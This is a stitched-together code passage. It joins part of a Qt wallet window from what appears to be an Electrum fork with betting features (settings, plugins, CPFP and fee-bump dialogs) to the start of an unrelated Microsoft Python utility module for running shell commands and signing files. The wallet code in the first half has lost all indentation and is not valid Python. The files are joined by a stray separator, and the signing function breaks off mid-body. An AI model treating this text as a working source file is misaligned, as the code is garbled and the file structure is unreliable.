unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x) , True)
conf_only = self.config.get('confirmed_only', True)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
def on_odd_change(checked):
self.config.set_key('iseffectiveodds', checked)
self.need_restart = True
bet_widgets = []
current_odd = self.config.get("iseffectiveodds", True)
oddswitch = ToogleSwitch("","")
oddswitch.setChecked(current_odd)
oddswitch.clicked.connect(on_odd_change)
oddswitch_label = QLabel("On Chain Odds / Effective Odds")
oddswitch_label.setStyleSheet("font-weight: bold;")
bet_widgets.append((oddswitch_label,oddswitch))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
(bet_widgets, _('Betting'))
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler; runs cleanup exactly once, then accepts the event.

    It seems in some rare cases this closeEvent() is called twice, so the
    cleaned_up flag guards against double teardown.
    """
    if self.cleaned_up:
        event.accept()
        return
    self.cleaned_up = True
    self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down the window: stop the wallet thread, detach network
    callbacks, persist window/console state, and release GUI resources.

    Called once from closeEvent(); statement order matters — the wallet
    thread stops first and the window is handed back to gui_object last.
    """
    self.wallet.thread.stop()
    if self.network:
        # Detach our handlers so no callback fires into a half-destroyed window.
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # Only remember explicit geometry; a maximized window is restored
        # via the "is_maximized" flag instead.
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # Keep only the last 50 console entries.
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    # Stop periodic UI updates before final disposal by the gui object.
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show a modal dialog listing all plugins, each with an enable
    checkbox, an optional settings widget, and a help button."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    # name -> settings widget, created lazily by enable_settings_widget()
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # Create the settings widget on first use (only for loaded plugins
        # that expose settings), then sync its enabled state.
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # plugins.toggle() loads/unloads the plugin and returns the
        # instance (or None when disabled).
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            # Keystore (hardware-wallet) plugins are managed elsewhere.
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # One broken plugin description must not break the whole dialog.
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Open the Child-Pays-For-Parent dialog and, on confirmation, build
    and show a CPFP transaction with the chosen child fee.

    parent_tx -- the stuck unconfirmed transaction
    new_tx    -- template child transaction spending an output of parent_tx
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # The child fee can never exceed the full value of the spent output.
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # Recompute derived labels whenever the fee field changes.
        out_amt = max_fee - fee_e.get_amount()
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_e.get_amount()
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # Fee the child must pay so (parent + child) achieves fee_per_kb,
        # clamped to [total_size, max_fee].
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Open the fee-bump (RBF) dialog for *tx* and, on confirmation, build
    and show a replacement transaction at the chosen higher fee rate."""
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    old_fee_rate = fee / tx_size  # sat/vbyte
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
    vbox.addWidget(QLabel(_('New Fee rate') + ':'))
    def on_textedit_rate():
        # Manual entry takes precedence: grey out the slider.
        fee_slider.deactivate()
    feerate_e = FeerateEdit(lambda: 0)
    # Suggest a meaningful bump: at least +1 unit, or 1.5x the old rate.
    feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
    feerate_e.textEdited.connect(on_textedit_rate)
    vbox.addWidget(feerate_e)
    def on_slider_rate(dyn, pos, fee_rate):
        fee_slider.activate()
        if fee_rate is not None:
            # Divided by 1000 — presumably the slider reports a per-kB
            # rate while the edit box is per-byte; TODO confirm.
            feerate_e.setAmount(fee_rate / 1000)
    fee_slider = FeeSlider(self, self.config, on_slider_rate)
    fee_slider.deactivate()
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee_rate = feerate_e.get_amount()
    try:
        new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    if is_final:
        # "Final" marks the replacement as non-replaceable (RBF off).
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Persist an offline transaction into the wallet's history.

    Returns True on success; False (after showing an error) when the
    wallet rejects the transaction.
    """
    win = self.top_level_window()
    try:
        added = self.wallet.add_transaction(tx.txid(), tx)
    except AddTransactionException as e:
        win.show_error(e)
        return False
    if not added:
        win.show_error(_("Transaction could not be saved.") + "\n" +
                       _("It conflicts with current history."))
        return False
    self.wallet.storage.write()
    # need to update at least: history_list, utxo_list, address_list
    self.need_update.set()
    msg = (_("Transaction added to wallet history.") + '\n\n' +
           _("Note: this is an offline transaction, if you want the network "
             "to see it, you need to broadcast it."))
    win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
    return True
|
utility_functions.py | ##
# Utility Functions to support re-use in python scripts.
# Includes functions for running external commands, etc
#
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import datetime
import functools
import importlib
import inspect
import logging
import os
import platform
import re
import shutil
import subprocess
import sys
import threading
import time
from collections import namedtuple
####
# Helper to allow Enum type to be used which allows better code readability
#
# ref: http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
####
class Enum(tuple):
    # Minimal enum built on tuple: Enum(("A", "B")).A == 0, .B == 1.
    # Attribute lookup resolves to tuple.index of the attribute name.
    __getattr__ = tuple.index
####
# Class to support running commands from the shell in a python environment.
# Don't use directly.
#
# PropagatingThread copied from sample here:
# https://stackoverflow.com/questions/2829329/catch-a-threads-exception-in-the-caller-thread-in-python
####
class PropagatingThread(threading.Thread):
    """Thread that captures its target's return value and re-raises any
    exception in the caller's thread when join() is called.

    PropagatingThread copied from sample here:
    https://stackoverflow.com/questions/2829329/catch-a-threads-exception-in-the-caller-thread-in-python
    """

    def run(self):
        # exc holds any exception raised by the target; ret its return value.
        self.exc = None
        try:
            if hasattr(self, '_Thread__target'):
                # Thread uses name mangling prior to Python 3.
                self.ret = self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
            else:
                self.ret = self._target(*self._args, **self._kwargs)
        except BaseException as e:
            self.exc = e

    def join(self, timeout=None):
        """Join the thread, honoring *timeout*; re-raise the target's
        exception if it raised, otherwise return its result.

        BUG FIX: the timeout argument was previously ignored (passed
        nothing to super().join()), so every join() blocked forever
        regardless of what the caller requested.
        """
        super(PropagatingThread, self).join(timeout)
        # After a timed-out join the target may not have run yet, so the
        # attributes may not exist — use getattr defaults.
        if getattr(self, 'exc', None):
            raise self.exc
        return getattr(self, 'ret', None)
####
# Helper functions for running commands from the shell in python environment
# Don't use directly
#
# process output stream and write to log.
# part of the threading pattern.
#
# http://stackoverflow.com/questions/19423008/logged-subprocess-communicate
####
def reader(filepath, outstream, stream, logging_level=logging.INFO):
    """Drain *stream* line by line, tee-ing each line to an optional file,
    an optional stream object, and the log.

    Part of the threading pattern for capturing subprocess output:
    http://stackoverflow.com/questions/19423008/logged-subprocess-communicate

    @param filepath      - optional path of a file to write the output to
    @param outstream     - optional stream object to write the output to
    @param stream        - binary stream to drain (e.g. Popen.stdout)
    @param logging_level - level each line is logged at
    """
    # open file if caller provided path
    f = open(filepath, "w") if filepath else None
    # BUG FIX: the file and stream were previously leaked if an exception
    # occurred mid-loop (e.g. a decode error); close them in finally.
    try:
        while True:
            s = stream.readline().decode()
            if not s:
                break
            if f is not None:
                # write to file if caller provided file
                f.write(s)
            if outstream is not None:
                # write to stream object if caller provided object
                outstream.write(s)
            logging.log(logging_level, s.rstrip())
    finally:
        stream.close()
        if f is not None:
            f.close()
####
# Returns a namedtuple containing information about host machine.
#
# @return namedtuple Host(os=OS Type, arch=System Architecture, bit=Highest Order Bit)
####
def GetHostInfo():
    """Return a Host namedtuple (os, arch, bit) describing this machine.

    arch is "x86" or "ARM"; bit is "32" or "64". Raises EnvironmentError
    when the processor string cannot be classified.
    """
    Host = namedtuple('Host', 'os arch bit')
    uname = platform.uname()
    os_type = uname.system
    machine = uname.machine
    machine_upper = machine.upper()

    arch = None
    bit = None

    # Classify the architecture family from the machine string.
    if ("X86" in machine_upper) or ("AMD" in machine_upper) or ("INTEL" in machine_upper):
        arch = "x86"
    elif ("ARM" in machine_upper) or ("AARCH" in machine_upper):
        arch = "ARM"

    # Classify the word size from the machine string.
    if "32" in machine:
        bit = "32"
    elif "64" in machine:
        bit = "64"

    if (arch is None) or (bit is None):
        raise EnvironmentError("Host info could not be parsed: {0}".format(str(uname)))
    return Host(os=os_type, arch=arch, bit=bit)
####
# This is a mixing to do timing on a function. Use it like this:
#
# @timing
# def function_i_want_to_time():
# ...
####
def timing(f):
    """Decorator that logs the wall-clock run time of *f* in milliseconds.

    Use it like this:

        @timing
        def function_i_want_to_time():
            ...

    BUG FIX: the wrapper previously dropped keyword arguments, so any
    decorated function called with kwargs raised TypeError; it also lost
    the wrapped function's metadata (fixed with functools.wraps).
    """
    @functools.wraps(f)
    def wrap(*args, **kwargs):
        time1 = time.time()
        ret = f(*args, **kwargs)
        time2 = time.time()
        logging.debug('{:s} function took {:.3f} ms'.format(f.__name__, (time2 - time1) * 1000.0))
        return ret
    return wrap
####
# Run a shell command and print the output to the log file
# This is the public function that should be used to run commands from the shell in python environment
# @param cmd - command being run, either quoted or not quoted
# @param parameters - parameters string taken as is
# @param capture - boolean to determine if caller wants the output captured in any format.
# @param workingdir - path to set to the working directory before running the command.
# @param outfile - capture output to file of given path.
# @param outstream - capture output to a stream.
# @param environ - shell environment variables dictionary that replaces the one inherited from the
# current process.
# @param logging_level - log level to log output at. Default is INFO
# @param raise_exception_on_nonzero - Setting to true causes exception to be raised if the cmd
# return code is not zero.
#
# @return returncode of called cmd
####
def RunCmd(cmd, parameters, capture=True, workingdir=None, outfile=None, outstream=None, environ=None,
           logging_level=logging.INFO, raise_exception_on_nonzero=False):
    """Run a shell command, streaming its output to the log (and optionally
    a file and/or stream object), and return its exit code.

    @param cmd - command to run, quoted or not
    @param parameters - parameter string appended as-is (after strip)
    @param capture - capture/log the command output
    @param workingdir - working directory for the command
    @param outfile - also write output to this file path
    @param outstream - also write output to this stream object
    @param environ - replacement environment dict (None inherits)
    @param logging_level - level output is logged at
    @param raise_exception_on_nonzero - raise instead of returning nonzero
    @return returncode of called cmd
    """
    cmd = cmd.strip('"\'')
    if " " in cmd:
        # Re-quote a path containing spaces so the shell sees one token.
        cmd = '"' + cmd + '"'
    if parameters is not None:
        parameters = parameters.strip()
        cmd += " " + parameters
    starttime = datetime.datetime.now()
    logging.log(logging_level, "Cmd to run is: " + cmd)
    logging.log(logging_level, "------------------------------------------------")
    logging.log(logging_level, "--------------Cmd Output Starting---------------")
    logging.log(logging_level, "------------------------------------------------")
    # NOTE(review): shell=True with a concatenated command string — callers
    # must not pass untrusted input here.
    c = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=workingdir, shell=True, env=environ)
    if(capture):
        # Drain stdout on a helper thread so the pipe cannot fill up and
        # deadlock the child while we wait on it.
        thread = PropagatingThread(target=reader, args=(outfile, outstream, c.stdout, logging_level))
        thread.start()
        c.wait()
        thread.join()
    else:
        c.wait()
    endtime = datetime.datetime.now()
    delta = endtime - starttime
    # Elapsed time rendered as mm:ss.
    endtime_str = "{0[0]:02}:{0[1]:02}".format(divmod(delta.seconds, 60))
    logging.log(logging_level, "------------------------------------------------")
    logging.log(logging_level, "--------------Cmd Output Finished---------------")
    logging.log(logging_level, "--------- Running Time (mm:ss): " + endtime_str + " ----------")
    logging.log(logging_level, "------------------------------------------------")
    if raise_exception_on_nonzero and c.returncode != 0:
        raise Exception("{0} failed with error code: {1}".format(cmd, c.returncode))
    return c.returncode
####
# Run a python script and print the output to the log file
# This is the public function that should be used to execute python scripts from the shell in python environment.
# The python script will be located using the path as if it was an executable.
#
# @param cmd - cmd string to run including parameters
# @param capture - boolean to determine if caller wants the output captured in any format.
# @param workingdir - path to set to the working directory before running the command.
# @param outfile - capture output to file of given path.
# @param outstream - capture output to a stream.
# @param environ - shell environment variables dictionary that replaces the one inherited from the
# current process.
#
# @return returncode of called cmd
####
def RunPythonScript(pythonfile, params, capture=True, workingdir=None, outfile=None, outstream=None,
                    environ=None, logging_level=logging.INFO, raise_exception_on_nonzero=False):
    """Locate *pythonfile* (absolute path, cwd-relative, or on PATH) and
    execute it with the current interpreter via RunCmd.

    @param pythonfile - path to the python script
    @param params - parameter string passed to the script
    (remaining parameters are forwarded to RunCmd)
    @return returncode of called cmd
    """
    # locate python file on path
    # BUG FIX: str.strip() returns a new string; the original code discarded
    # the results of both strip() calls, so surrounding quotes/whitespace
    # were never actually removed.
    pythonfile = pythonfile.strip('"\'')
    if " " in pythonfile:
        pythonfile = '"' + pythonfile + '"'
    params = params.strip()
    logging.debug("RunPythonScript: {0} {1}".format(pythonfile, params))
    if(os.path.isabs(pythonfile)):
        logging.debug("Python Script was given as absolute path: %s" % pythonfile)
    elif(os.path.isfile(os.path.join(os.getcwd(), pythonfile))):
        pythonfile = os.path.join(os.getcwd(), pythonfile)
        logging.debug("Python Script was given as relative path: %s" % pythonfile)
    else:
        # loop thru path environment variable
        for a in os.getenv("PATH").split(os.pathsep):
            a = os.path.normpath(a)
            if os.path.isfile(os.path.join(a, pythonfile)):
                pythonfile = os.path.join(a, pythonfile)
                logging.debug("Python Script was found on the path: %s" % pythonfile)
                break
    params = pythonfile + " " + params
    return RunCmd(sys.executable, params, capture=capture, workingdir=workingdir, outfile=outfile,
                  outstream=outstream, environ=environ, logging_level=logging_level,
                  raise_exception_on_nonzero=raise_exception_on_nonzero)
####
# Locally Sign input file using Windows SDK signtool. This will use a local Pfx file.
# WARNING!!! : This should not be used for production signing as that process should follow stronger
# security practices (HSM / smart cards / etc)
#
# Signing is in format specified by UEFI authentacted variables
####
def DetachedSignWithSignTool(SignToolPath, ToSignFilePath, SignatureOutputFile, PfxFilePath,
                             PfxPass=None, Oid="1.2.840.113549.1.7.2", Eku=None):
    """Sign ToSignFilePath with the Windows SDK signtool using a local PFX,
    producing a detached PKCS#7 signature at SignatureOutputFile.

    WARNING!!! : This should not be used for production signing as that
    process should follow stronger security practices (HSM / smart cards / etc)

    Signing is in format specified by UEFI authenticated variables.
    @return signtool's exit code (0 on success; -1 if signtool not found)
    """
    # check signtool path
